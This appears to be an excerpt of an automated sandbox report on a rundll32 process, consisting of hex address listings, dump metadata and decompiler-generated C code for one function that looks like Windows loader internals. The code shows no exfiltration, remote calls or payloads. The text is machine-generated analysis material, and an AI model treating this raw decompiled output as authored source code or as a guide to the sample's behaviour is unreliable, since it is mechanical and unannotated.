                                                                                            0x04645aab
                                                                                            0x04645a79
                                                                                            0x04645a52
                                                                                            0x046021f7
                                                                                            0x046021f9
                                                                                            0x046021fe
                                                                                            0x046021fe
                                                                                            0x046021e3
                                                                                            0x04602195
                                                                                            0x0460236c
                                                                                            0x04602122
                                                                                            0x04602122
                                                                                            0x04602124
                                                                                            0x04602231
                                                                                            0x04602236
                                                                                            0x04602236
                                                                                            0x04602238
                                                                                            0x04602238
                                                                                            0x04602240
                                                                                            0x04602242
                                                                                            0x04602244
                                                                                            0x046459fc
                                                                                            0x0460218c
                                                                                            0x0460218c
                                                                                            0x00000000
                                                                                            0x0460218c
                                                                                            0x0460224a
                                                                                            0x0460224f
                                                                                            0x04602256
                                                                                            0x04602304
                                                                                            0x04602309
                                                                                            0x0460230f
                                                                                            0x0460231e
                                                                                            0x0460231e
                                                                                            0x0460231e
                                                                                            0x04602320
                                                                                            0x04602325
                                                                                            0x0460232a
                                                                                            0x0460232c
                                                                                            0x0460233e
                                                                                            0x0460233e
                                                                                            0x00000000
                                                                                            0x0460232c
                                                                                            0x04602311
                                                                                            0x04602317
                                                                                            0x0460231a
                                                                                            0x0460231c
                                                                                            0x04602380
                                                                                            0x04602380
                                                                                            0x04602380
                                                                                            0x04602384
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602386
                                                                                            0x00000000
                                                                                            0x0460231c
                                                                                            0x0460225c
                                                                                            0x0460225c
                                                                                            0x00000000
                                                                                            0x0460225c
                                                                                            0x0460212a
                                                                                            0x04602134
                                                                                            0x04602138
                                                                                            0x0460213d
                                                                                            0x04645858
                                                                                            0x04645863
                                                                                            0x04645863
                                                                                            0x04645867
                                                                                            0x0464586a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0464586c
                                                                                            0x0464586c
                                                                                            0x04645871
                                                                                            0x04645875
                                                                                            0x04645877
                                                                                            0x04645997
                                                                                            0x0464599c
                                                                                            0x046459a1
                                                                                            0x046459a7
                                                                                            0x046459a7
                                                                                            0x00000000
                                                                                            0x046459a7
                                                                                            0x0464587d
                                                                                            0x00000000
                                                                                            0x0464588b
                                                                                            0x0464588b
                                                                                            0x04645890
                                                                                            0x04645892
                                                                                            0x04645894
                                                                                            0x04645899
                                                                                            0x0464589b
                                                                                            0x046458a0
                                                                                            0x046458a0
                                                                                            0x046458aa
                                                                                            0x046458b2
                                                                                            0x046458b6
                                                                                            0x046458be
                                                                                            0x046458c6
                                                                                            0x046458c9
                                                                                            0x0464590d
                                                                                            0x04645917
                                                                                            0x0464591a
                                                                                            0x0464591c
                                                                                            0x04645920
                                                                                            0x04645928
                                                                                            0x0464592a
                                                                                            0x0464592c
                                                                                            0x0464592e
                                                                                            0x0464592e
                                                                                            0x046458cb
                                                                                            0x046458cd
                                                                                            0x046458d8
                                                                                            0x046458e0
                                                                                            0x046458f4
                                                                                            0x046458fe
                                                                                            0x046458fe
                                                                                            0x0464593a
                                                                                            0x0464593e
                                                                                            0x04645940
                                                                                            0x04645942
                                                                                            0x00000000
                                                                                            0x04645944
                                                                                            0x04645944
                                                                                            0x04645949
                                                                                            0x0464594e
                                                                                            0x0464594e
                                                                                            0x04645953
                                                                                            0x0464595b
                                                                                            0x04645976
                                                                                            0x04645976
                                                                                            0x0464597a
                                                                                            0x0464597f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04645981
                                                                                            0x04645981
                                                                                            0x04645981
                                                                                            0x04645983
                                                                                            0x04645988
                                                                                            0x0464598d
                                                                                            0x04645991
                                                                                            0x04645991
                                                                                            0x00000000
                                                                                            0x0464595d
                                                                                            0x0464595d
                                                                                            0x04645963
                                                                                            0x04645965
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04645967
                                                                                            0x04645967
                                                                                            0x0464596b
                                                                                            0x0464596d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0464596f
                                                                                            0x04645971
                                                                                            0x04645971
                                                                                            0x04645974
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04645974
                                                                                            0x00000000
                                                                                            0x04645967
                                                                                            0x0464595b
                                                                                            0x04645942
                                                                                            0x04645863
                                                                                            0x04602143
                                                                                            0x04602143
                                                                                            0x04602149
                                                                                            0x0460214f
                                                                                            0x046022ec
                                                                                            0x046022f1
                                                                                            0x046022f6
                                                                                            0x00000000
                                                                                            0x046022f6
                                                                                            0x04602159
                                                                                            0x04602173
                                                                                            0x04602173
                                                                                            0x0460217d
                                                                                            0x04602181
                                                                                            0x04602186
                                                                                            0x046459ae
                                                                                            0x046459b2
                                                                                            0x046459b5
                                                                                            0x046459b7
                                                                                            0x046459ba
                                                                                            0x046459cd
                                                                                            0x046459d1
                                                                                            0x046459d5
                                                                                            0x046459d9
                                                                                            0x046459db
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046459dd
                                                                                            0x046459dd
                                                                                            0x046459e1
                                                                                            0x046459e4
                                                                                            0x046459e7
                                                                                            0x046459ee
                                                                                            0x046459ee
                                                                                            0x046459f3
                                                                                            0x046459f3
                                                                                            0x00000000
                                                                                            0x04602186
                                                                                            0x04602164
                                                                                            0x0460216d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460216d
                                                                                            0x04602106
                                                                                            0x04602266
                                                                                            0x046020d8
                                                                                            0x046020da
                                                                                            0x046020e0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d74ebb5626b4bf00a31e31fac1c72b5b80fa681fa77dd95026231cf7a570b65b
                                                                                            • Instruction ID: 47032aadf0724cf4e1f64a78c32d678267c779a737d1b8b38d0061fbefb3a39f
                                                                                            • Opcode Fuzzy Hash: d74ebb5626b4bf00a31e31fac1c72b5b80fa681fa77dd95026231cf7a570b65b
                                                                                            • Instruction Fuzzy Hash: 51F1BF31608341AFDB29CE68C85476B77E1AFD5324F04899DEA969B380F774F841CB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045ED5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 87%
                                                                                            			E045ED5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x46cd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E045E6600(0x46c52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x46c7b9c; // 0x0
							_t281 = L045F4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0461F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x46c7b90; // 0x77cf0000
								if(_t384 == 0) {
									_t353 =  *0x46c7b8c; // 0x29e2a08
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x29e2ab8
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E045F2280(_t200, 0x46c84d8);
									_t277 =  *0x46c85f4; // 0x29eba90
									_t351 =  *0x46c85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x76280000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x29ebad8
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x29eba28
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x29ebad8
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x29e2f78
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E045EFFB0(_t287, _t353, 0x46c84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0462CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E045E6600(0x46c52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E045E7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x46cb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0465E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x46c8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x46cb218; // 0xc08a58ed
														asm("ror edi, cl");
														 *0x46cb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E045F2280(_t250, 0x46c84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04613898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E045EFFB0(_t293, _t353, 0x46c84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E046137F5(_t353, 0);
																}
																E04610413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04609B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E046002D6(_t174);
																}
																L045F77F0( *0x46c7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0460C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L045EEC7F(_t353);
										L046019B8(_t287, 0, _t353, 0);
										_t200 = E045DF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0461B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x46cb2f8; // 0x4b0000
									if((_t206 |  *0x46cb2fc) == 0 || ( *0x46cb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x46cb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04686B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04686AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E045EE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L045EEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04619730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E045EE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L045E8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04613C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                                                            0x045ed5f2
                                                                                            0x045ed5f5
                                                                                            0x045ed5f5
                                                                                            0x045ed5fd
                                                                                            0x045ed600
                                                                                            0x045ed60a
                                                                                            0x045ed60d
                                                                                            0x045ed617
                                                                                            0x045ed61d
                                                                                            0x045ed627
                                                                                            0x045ed62e
                                                                                            0x045ed911
                                                                                            0x045ed913
                                                                                            0x00000000
                                                                                            0x045ed919
                                                                                            0x045ed919
                                                                                            0x045ed919
                                                                                            0x045ed634
                                                                                            0x045ed634
                                                                                            0x045ed634
                                                                                            0x045ed634
                                                                                            0x045ed640
                                                                                            0x045ed8bf
                                                                                            0x00000000
                                                                                            0x045ed646
                                                                                            0x045ed646
                                                                                            0x045ed64d
                                                                                            0x045ed652
                                                                                            0x0463b2fc
                                                                                            0x0463b2fc
                                                                                            0x0463b302
                                                                                            0x0463b33b
                                                                                            0x0463b341
                                                                                            0x00000000
                                                                                            0x0463b304
                                                                                            0x0463b304
                                                                                            0x0463b319
                                                                                            0x0463b31e
                                                                                            0x0463b324
                                                                                            0x0463b326
                                                                                            0x0463b332
                                                                                            0x0463b347
                                                                                            0x0463b34c
                                                                                            0x0463b351
                                                                                            0x0463b35a
                                                                                            0x00000000
                                                                                            0x0463b328
                                                                                            0x0463b328
                                                                                            0x00000000
                                                                                            0x0463b328
                                                                                            0x0463b326
                                                                                            0x045ed658
                                                                                            0x045ed658
                                                                                            0x045ed65b
                                                                                            0x045ed665
                                                                                            0x00000000
                                                                                            0x045ed66b
                                                                                            0x045ed66b
                                                                                            0x045ed66b
                                                                                            0x045ed66b
                                                                                            0x045ed66d
                                                                                            0x045ed672
                                                                                            0x045ed67a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045ed680
                                                                                            0x045ed686
                                                                                            0x045ed8ce
                                                                                            0x045ed8d4
                                                                                            0x045ed8da
                                                                                            0x045ed8dd
                                                                                            0x045ed8dd
                                                                                            0x045ed8e0
                                                                                            0x045ed68c
                                                                                            0x045ed691
                                                                                            0x045ed69d
                                                                                            0x045ed6a2
                                                                                            0x045ed6a7
                                                                                            0x045ed6b0
                                                                                            0x045ed6b0
                                                                                            0x045ed6b5
                                                                                            0x045ed6e0
                                                                                            0x045ed6b7
                                                                                            0x045ed6b7
                                                                                            0x045ed6b9
                                                                                            0x045ed6b9
                                                                                            0x045ed6bb
                                                                                            0x045ed6bd
                                                                                            0x045ed6ce
                                                                                            0x045ed6d0
                                                                                            0x045ed6d2
                                                                                            0x0463b363
                                                                                            0x0463b365
                                                                                            0x00000000
                                                                                            0x0463b36b
                                                                                            0x00000000
                                                                                            0x0463b36b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045ed6bf
                                                                                            0x045ed6bf
                                                                                            0x045ed6e5
                                                                                            0x045ed6e7
                                                                                            0x045ed6e9
                                                                                            0x045ed6e9
                                                                                            0x045ed6ec
                                                                                            0x045ed6ec
                                                                                            0x045ed6ef
                                                                                            0x045ed6f5
                                                                                            0x045ed6f9
                                                                                            0x045ed6fb
                                                                                            0x045ed6fd
                                                                                            0x045ed701
                                                                                            0x045ed703
                                                                                            0x045ed70a
                                                                                            0x045ed70a
                                                                                            0x045ed70a
                                                                                            0x045ed701
                                                                                            0x045ed70d
                                                                                            0x045ed710
                                                                                            0x045ed710
                                                                                            0x045ed6c1
                                                                                            0x045ed6c1
                                                                                            0x045ed6c1
                                                                                            0x045ed6c6
                                                                                            0x0463b36d
                                                                                            0x0463b36f
                                                                                            0x00000000
                                                                                            0x0463b375
                                                                                            0x0463b375
                                                                                            0x0463b375
                                                                                            0x00000000
                                                                                            0x0463b375
                                                                                            0x00000000
                                                                                            0x045ed6cc
                                                                                            0x045ed6d8
                                                                                            0x045ed6d8
                                                                                            0x045ed6d8
                                                                                            0x00000000
                                                                                            0x045ed6c6
                                                                                            0x045ed6bf
                                                                                            0x00000000
                                                                                            0x045ed6da
                                                                                            0x045ed6da
                                                                                            0x045ed716
                                                                                            0x045ed71b
                                                                                            0x045ed720
                                                                                            0x045ed726
                                                                                            0x045ed726
                                                                                            0x045ed72d
                                                                                            0x00000000
                                                                                            0x045ed733
                                                                                            0x045ed739
                                                                                            0x045ed742
                                                                                            0x045ed750
                                                                                            0x045ed758
                                                                                            0x045ed764
                                                                                            0x045ed776
                                                                                            0x045ed77a
                                                                                            0x045ed783
                                                                                            0x045ed928
                                                                                            0x045ed92c
                                                                                            0x045ed93d
                                                                                            0x045ed944
                                                                                            0x045ed94f
                                                                                            0x045ed954
                                                                                            0x045ed956
                                                                                            0x045ed95f
                                                                                            0x045ed961
                                                                                            0x045ed973
                                                                                            0x045ed973
                                                                                            0x045ed956
                                                                                            0x045ed944
                                                                                            0x045ed92c
                                                                                            0x045ed78b
                                                                                            0x0463b394
                                                                                            0x045ed791
                                                                                            0x045ed798
                                                                                            0x0463b3a3
                                                                                            0x0463b3bb
                                                                                            0x0463b3bb
                                                                                            0x045ed7a5
                                                                                            0x045ed866
                                                                                            0x045ed870
                                                                                            0x045ed884
                                                                                            0x045ed892
                                                                                            0x045ed898
                                                                                            0x045ed89e
                                                                                            0x045ed8a0
                                                                                            0x045ed8a6
                                                                                            0x045ed8ac
                                                                                            0x045ed8ae
                                                                                            0x045ed8b4
                                                                                            0x045ed8b4
                                                                                            0x045ed8ae
                                                                                            0x045ed7a5
                                                                                            0x045ed78b
                                                                                            0x045ed7b1
                                                                                            0x0463b3c5
                                                                                            0x0463b3c5
                                                                                            0x045ed7c3
                                                                                            0x045ed7ca
                                                                                            0x045ed7e5
                                                                                            0x045ed7eb
                                                                                            0x045ed8eb
                                                                                            0x045ed8ed
                                                                                            0x00000000
                                                                                            0x045ed8f3
                                                                                            0x045ed8f3
                                                                                            0x045ed8f3
                                                                                            0x00000000
                                                                                            0x045ed8ed
                                                                                            0x045ed7cc
                                                                                            0x045ed7cc
                                                                                            0x045ed7d2
